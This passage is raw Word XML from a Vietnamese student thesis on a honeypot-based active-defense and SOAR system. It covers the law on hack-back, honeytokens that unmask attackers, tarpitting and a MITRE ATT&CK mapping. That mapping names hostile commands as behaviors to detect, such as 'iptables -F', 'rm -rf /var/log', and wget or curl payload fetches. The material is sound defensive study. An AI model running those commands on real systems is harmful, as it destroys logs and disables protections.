            <wp:extent cx="5486400" cy="3092335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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486400" cy="3092335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986DBDF"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2.2: Kiến trúc mô phỏng hệ thống tệp và lệnh của Cowrie Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ADD401"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2.3 Phân tích Pháp lý và Kỹ thuật về 'Tấn công ngược' (Hack-back vs. Active Defense)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAE39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các cuộc thảo luận kỹ thuật an ninh mạng, cụm từ 'Tấn công ngược kẻ tấn công' (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Counter-attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc Hack-back) thường xuyên được nhắc đến như một khát vọng phản kháng của đội ngũ phòng thủ (Blue Team). Tuy nhiên, trên cả phương diện kỹ thuật thực tế và khung pháp lý quốc tế lẫn Việt Nam, việc thực hiện 'Hack-back' mù quáng tiềm ẩn những rủi ro pháp lý và kỹ thuật đặc biệt nghiêm trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEAA8D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Bài toán Phân định Mục tiêu (Attribution Problem): Trong không gian mạng, các tin tặc chuyên nghiệp và các mạng botnet hiếm khi tấn công trực tiếp từ máy tính cá nhân của chúng. Chúng luôn giấu mình sau nhiều lớp Proxy ẩn danh, mạng Tor, máy chủ VPN thương mại, hoặc nguy hiểm hơn là thông qua hàng triệu thiết bị IoT (Router, Camera) của các nạn nhân vô tội bị chiếm quyền điều khiển. Nếu Blue Team thực hiện 'tấn công ngược' (như phát động DoS hay khai thác lỗ hổng) vào địa chỉ IP nguồn, chúng ta sẽ trực tiếp xâm phạm và phá hoại hệ thống của bên thứ ba vô tội, biến chính mình từ nạn nhân thành tội phạm công nghệ cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5B4F4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Khung Pháp lý Hiện hành: Điều 287 và Điều 289 Bộ luật Hình sự Việt Nam năm 2015 (sửa đổi, bổ sung 2017), Luật An ninh mạng Việt Nam 2018, cũng như Đạo luật Lạm dụng và Gian lận Máy tính của Hoa Kỳ (CFAA) đều nghiêm cấm mọi hành vi truy cập bất hợp pháp, phá hoại hoặc làm gián đoạn hoạt động của mạng máy tính mà không có thẩm quyền hợp pháp, bất kể mục đích của hành vi đó là để 'tự vệ' hay 'phản đòn'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCA89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xml:space="preserve">Chính vì lý do đó, các tổ chức an ninh mạng hàng đầu thế giới đã định nghĩa lại khái niệm phản đòn thành: **Phòng thủ Chủ động (Active Defense &amp; Active </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Deception)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">* theo chuẩn khung chiến lược **MITRE Engage (trước đây là MITRE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Shield)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>* và **MITRE D3FEND**. Phòng thủ chủ động là nghệ thuật tác chiến hợp pháp và an toàn tuyệt đối, tập trung vào việc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB736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Nhử đối phương vào các tài nguyên giả định (Decoy &amp; Lures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E62CA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Đánh lừa và cung cấp thông tin sai lệch để đối phương tiêu hao nguồn lực vô ích (Tarpitting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094ACE8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Trinh sát ngược nguồn mở (Reverse OSINT) để nhận diện hạ tầng của đối phương mà không vi phạm pháp luật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E26AD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Gài bẫy mồi nhử (Honeytokens) để khi kẻ tấn công mang chiến lợi phẩm về mở trên máy thật của chúng, hệ thống sẽ bắt được vị trí và danh tính thực sự của đối thủ (De-anonymization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2A54E3"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2.2: So sánh toàn diện giữa Tấn công ngược bất hợp pháp và Phòng thủ chủ động hợp pháp</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>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19E2C482" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35074F9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Tiêu chí So sánh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74847C5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Tấn công ngược (Hack-Back / Strike Back)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19A2E97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Phòng thủ Chủ động (Active Defense / MITRE Engage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="59334865" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B99800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Tính Hợp pháp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AD0527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Trái pháp luật (Vi phạm Điều 287 BLHS, Luật ANM 2018).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64F9AB7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Hoàn toàn Hợp pháp (Tuân thủ quyền tự bảo vệ hệ thống nội bộ).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="15EBEF1C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F6D40E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Đối tượng Tác động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D60B61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Tác động trực tiếp vào máy chủ của IP tấn công (Dễ trúng máy vô tội).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4235683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Tác động trong phạm vi tài nguyên và hệ thống bẫy do ta sở hữu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="485F266B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1740B29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Mục tiêu Tác chiến</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="280FB47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Cố gắng phá hủy, xâm nhập hoặc DoS máy đối phương.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D8A941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Thu thập tình báo (OSINT), làm kiệt quệ tài nguyên, lật tẩy danh tính thật.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="67912674" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0551B36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Độ rủi ro Hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A5C832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Rất cao (Bị kiện tụng pháp lý, bị trả đũa quy mô lớn hơn).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A1F8DD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Rất thấp (Được bảo vệ trong môi trường Sandbox và Deception).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C5386" w:rsidRPr="005B486F" w14:paraId="0E602792" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="467D169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Độ tin cậy Định danh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47D79E2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Kém (Thường chỉ đánh trúng Proxy hoặc Botnet Zombie).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3134" w:type="dxa"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35DA2F9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Rất cao (Lật tẩy IP thật khi hacker mở Honeytoken trên máy cá nhân).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19DAC79C"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79286EA8"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2.4 Chiến lược Đánh lừa Chủ động (Active Deception) và Kỹ thuật Honeytoken /Canary Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A0BB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Kỹ thuật Honeytoken (hoặc Canary Token) là một trong những vũ khí phòng thủ chủ động tinh vi nhất của an ninh mạng hiện đại. Một Honeytoken là một mẩu dữ liệu giả mạo </w:t>
      </w:r>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(Fake Credential, API Key, Database Dump, File tài liệu nội bộ) được cố tình gài cắm ở những vị trí mà chỉ có kẻ xâm nhập trái phép mới tìm thấy và tò mò tiếp cận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FEF2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Cơ chế Khử ẩn danh Kẻ tấn công (Adversarial De-anonymization) hoạt động dựa trên tâm lý học của tin tặc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D56813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1 - Gài bẫy (Luring): Bên trong hệ thống tệp tin của Cowrie, ta tạo ra các tệp tin có vẻ vô cùng giá trị, ví dụ: '/root</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'/root/.bash_history' hoặc '/var/backups/db_dump_passwords.txt'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA6D5F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2 - Đánh cắp (Exfiltration): Khi kẻ tấn công xâm nhập thành công vào Honeypot qua SSH, đối phương sẽ sử dụng lệnh 'cat' hoặc dùng SFTP để tải các tệp tin này về máy của chúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C5D0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3 - Thử nghiệm (Weaponization &amp; Trigger): Kẻ tấn công muốn sử dụng tài khoản AWS hoặc mật khẩu vừa đánh cắp. Để làm điều đó, chúng sẽ mở tài liệu trên trình duyệt hoặc chạy lệnh curl xác thực tài khoản. Tuy nhiên, các thông tin trong file bẫy đều được nhúng sẵn một mã định danh theo dõi (Canary Webhook Beacon).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11396A4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4 - Lật tẩy Danh tính Thật (De-cloaking): Khi kẻ tấn công kích hoạt đường link trên máy cá nhân của chúng (nơi chúng không bật proxy hoặc đã ngắt kết nối SSH bẫy), gói tin HTTP request sẽ gửi thẳng về Webhook Server của ta. Lúc này, hệ thống sẽ ghi nhận được: Địa chỉ IP thực của hacker, Nhà mạng Internet thực tế (ISP), Thông số User-Agent trình duyệt và Hệ điều hành máy thật của hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFCB83"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 xml:space="preserve">2.5 Khung Tự động hóa và Điều phối Phản ứng Sự cố </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ninh (SOAR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F3B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Khái niệm SOAR (Security Orchestration, Automation, and Response) được hãng nghiên cứu Gartner định hình vào năm 2017, đại diện cho thế hệ công nghệ quản trị an ninh mạng hợp nhất ba năng lực cốt lõi: Quản lý mối đe dọa và lỗ hổng (Threat &amp; Vulnerability Management), Tự động hóa vận hành an ninh (Security Operations Automation) và Điều phối phản ứng sự cố (Incident Response Orchestration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F5D9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một trung tâm điều hành SOC tiêu chuẩn, thời gian trung bình để phản ứng (Mean Time to Respond - MTTR) là thước đo sống còn đối với sự an toàn của doanh nghiệp. Nếu không có SOAR, một chu trình phản ứng bao gồm 4 bước tách rời:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F5417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Phát hiện: Chuyên viên nhìn thấy log cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE530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Xác minh: Chuyên viên copy IP lên AbuseIPDB, VirusTotal để kiểm tra danh tiếng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622D16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3. Quyết định: Đánh giá xem IP có phải là IP quét nguy hại không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C87BA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Khắc phục: SSH vào Firewall để gõ lệnh chặn IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463C32E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Quy trình thủ công này thường mất 15-20 phút và dễ mắc lỗi do con người. Với SOAR, toàn bộ quy trình này được mã hóa thành các kịch bản thực thi tự động (Automated Playbooks). Khi có sự kiện đạt ngưỡng vi phạm, Playbook sẽ tự động chạy trong vài trăm mili-giây, thực hiện trinh sát, cập nhật bảng luật tường lửa và gửi thông báo tổng hợp tới thiết bị của chuyên viên, giảm MTTR xuống mức gần bằng 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E795FC0"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1F2D6602" wp14:editId="2BAF176C">
            <wp:extent cx="5486400" cy="3092335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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486400" cy="3092335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="615AF315"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2.3: Vòng đời xử lý sự cố an ninh chuẩn NIST SP 800-61 r2 tích hợp SOAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792C5E84"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2.6 Kỹ thuật Giam lỏng và Tiêu hao Tài nguyên Kẻ tấn công (Connection Tarpitting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632F1C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Tarpit (Hố nhựa đường) là một kỹ thuật mạng phòng thủ chủ động cực kỳ độc đáo và hiệu quả cao trong việc đối phó với các đợt tấn công từ điển tự động. Khác với cơ chế Tường lửa truyền thống (lập tức gửi cờ TCP RST hoặc âm thầm DROP gói tin), Tarpit chọn cách: Chấp nhận kết nối TCP của kẻ tấn công nhưng cố tình phản hồi dữ liệu với tốc độ chậm nhất có thể (chẳng hạn như gửi từng ký tự banner SSH cách nhau 10 đến 15 giây).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71401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Tác động tiêu hao đối với Kẻ tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3CCE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Các công cụ tấn công brute-force tự động (như Hydra, Medusa, hay các botnet script) hoạt động dựa trên cơ chế đa luồng (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Multi-threading</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>). Mỗi luồng sẽ mở một socket TCP tới máy chủ mục tiêu và chờ đợi phản hồi để thử tiếp mật khẩu khác. Khi bị chuyển hướng vào Tarpit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C8960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Socket của kẻ tấn công bị 'treo' vô thời hạn, không bị ngắt kết nối nhưng cũng không thể gửi tiếp yêu cầu mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F874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Bảng tài nguyên kết nối (File Descriptors / Socket Pool) trên máy tấn công bị lấp đầy và cạn kiệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126532E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Cuộc tấn công bị tê liệt hoàn toàn mà kẻ tấn công không hề nhận được bất kỳ tín hiệu lỗi nào để khởi động lại tiến trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F147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2.7 Khung ma trận TTPs chuẩn MITRE ATT&amp;CK trong Phân tích Hành vi Tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA13B2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MITRE ATT&amp;CK (Adversarial Tactics, Techniques, and Common Knowledge) là một cơ sở tri thức toàn cầu chuẩn hóa hành vi của các tác nhân đe dọa dựa trên các quan sát thực tế trong thế giới thực. Việc áp dụng MITRE ATT&amp;CK vào hệ thống Honeypot cho phép chuẩn hóa các sự kiện kỹ thuật thô thành các kỹ thuật tác chiến có ý nghĩa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D670EC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đồ án này, các kỹ thuật cốt lõi sau được nhận diện và ánh xạ tự động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF9AD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T1110 (Brute Force) / T1110.001 (Password Guessing): Hành vi thử liên tiếp nhiều cặp mật khẩu vào tài khoản root/admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD36E1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T1078 (Valid Accounts): Hành vi đăng nhập thành công vào Honeypot bằng tài khoản mặc định hoặc đoán trúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06332F5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T1082 (System Information Discovery): Các lệnh thu thập thông tin hệ thống do hacker thực thi ngay sau khi đăng nhập (uname -a, cat /etc/issue, cat /proc/cpuinfo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAEA8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T1059 (Command and Scripting Interpreter): Hành vi thực thi các câu lệnh bash, python, sh bên trong terminal ảo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3138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T1105 (Ingress Tool Transfer): Kỹ thuật tải công cụ và mã độc từ máy chủ C2 về máy bẫy thông qua wget hoặc curl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17420D8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T1552.001 (Credentials </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B486F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Files): Kỹ thuật tìm kiếm và đọc các tệp tin chứa thông tin nhạy cảm </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id_rsa, db_dump).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D867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T1562.001 (Impair Defenses - Disable or Modify Tools): Hành vi gõ lệnh nhằm tắt tường lửa hoặc xóa lịch sử log (iptables -F, rm -rf /var/log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DECC406"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4F28DB84"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3: THIẾT KẾ KIẾN TRÚC HỆ THỐNG MINI-SOC ACTIVE DEFENSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7A3FC6"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3.1 Yêu cầu Bài toán và Thiết kế Kiến trúc Phân lớp Tổng thể</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED938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giải quyết toàn diện bài toán phòng thủ chủ động và vượt qua giới hạn của việc cài đặt ứng dụng đơn thuần, hệ thống được thiết kế theo mô hình Kiến trúc Phân lớp Mini-SOC 5 tầng (5-Layer Architecture). Mỗi tầng đảm nhiệm một vai trò chuyên biệt, độc lập và giao tiếp với nhau thông qua các giao diện lập trình hướng sự kiện (Event-driven Interfaces):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064275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1: Lớp Cảm biến &amp; Đánh lừa Chủ động (Active Deception &amp; Honeypot Layer) - Đóng vai trò là tuyến đầu tiếp nhận tấn công, gồm Cowrie Honeypot tùy biến, hệ thống tệp tin giả lập và các tệp tin mồi nhử Honeytoken có nhúng Webhook Beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA42FD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Tầng 2: Lớp Thu thập &amp; Xử lý Luồng Sự kiện (Event Ingestion &amp; Streaming Layer) - Chịu trách nhiệm theo dõi tệp tin nhật ký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xml:space="preserve"> theo cơ chế stream thời gian thực, chuẩn hóa các trường dữ liệu và bóc tách các tham số IP, tài khoản, câu lệnh và băm tệp tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCE70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3: Lớp Tương quan &amp; Định danh Tác chiến (Correlation &amp; Threat Intelligence Layer) - 'Bộ não' của hệ thống, chứa thuật toán cửa sổ trượt (Sliding Window Algorithm) để phát hiện Brute-force, tự động ánh xạ sự kiện sang chuẩn MITRE ATT&amp;CK và kích hoạt phân hệ Trinh sát ngược (Reverse Reconnaissance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC71A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4: Lớp Thực thi Phản ứng Tự động (SOAR Enforcement &amp; Active Counter-measure Layer) - Chứa các cơ chế phản đòn hợp pháp: Giam lỏng kết nối vào Tarpit để khóa cứng luồng quét của hacker, tự động cập nhật iptables/nftables để ngăn chặn xâm nhập và xuất bản danh sách đen IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775589B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5: Lớp Giám sát &amp; Điều khiển Tương tác 2 Chiều (Bidirectional Command &amp; Monitoring Layer) - Cung cấp giao diện trực quan thông qua Telegram SOAR Bot với các nút bấm tương tác (Inline Buttons), cho phép chuyên viên SOC can thiệp và kích hoạt các hành động phòng thủ chỉ bằng một chạm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790717E"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="772242A7" wp14:editId="7863F840">
            <wp:extent cx="5486400" cy="3591098"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17015869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486400" cy="3591098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5EC41D"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3.1: Sơ đồ kiến trúc tổng thể 5 phân lớp của Hệ sinh thái Active Defense &amp; SOAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D968878"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3.2 Thiết kế Tầng Thu thập &amp; Streaming Sự kiện thời gian thực (Cowrie Event Collector)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE27D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môi trường tác chiến thực tế, một đợt tấn công brute-force có thể tạo ra hàng trăm lượt đăng nhập mỗi giây. Nếu đọc log theo kiểu tuần tự (Polling/Batch), hệ thống sẽ gặp phải độ trễ lớn và tiêu tốn bộ nhớ I/O. Phân hệ Event Collector được thiết kế theo cơ chế Non-blocking Asynchronous Stream:</w:t>
      </w:r>
    </w:p>
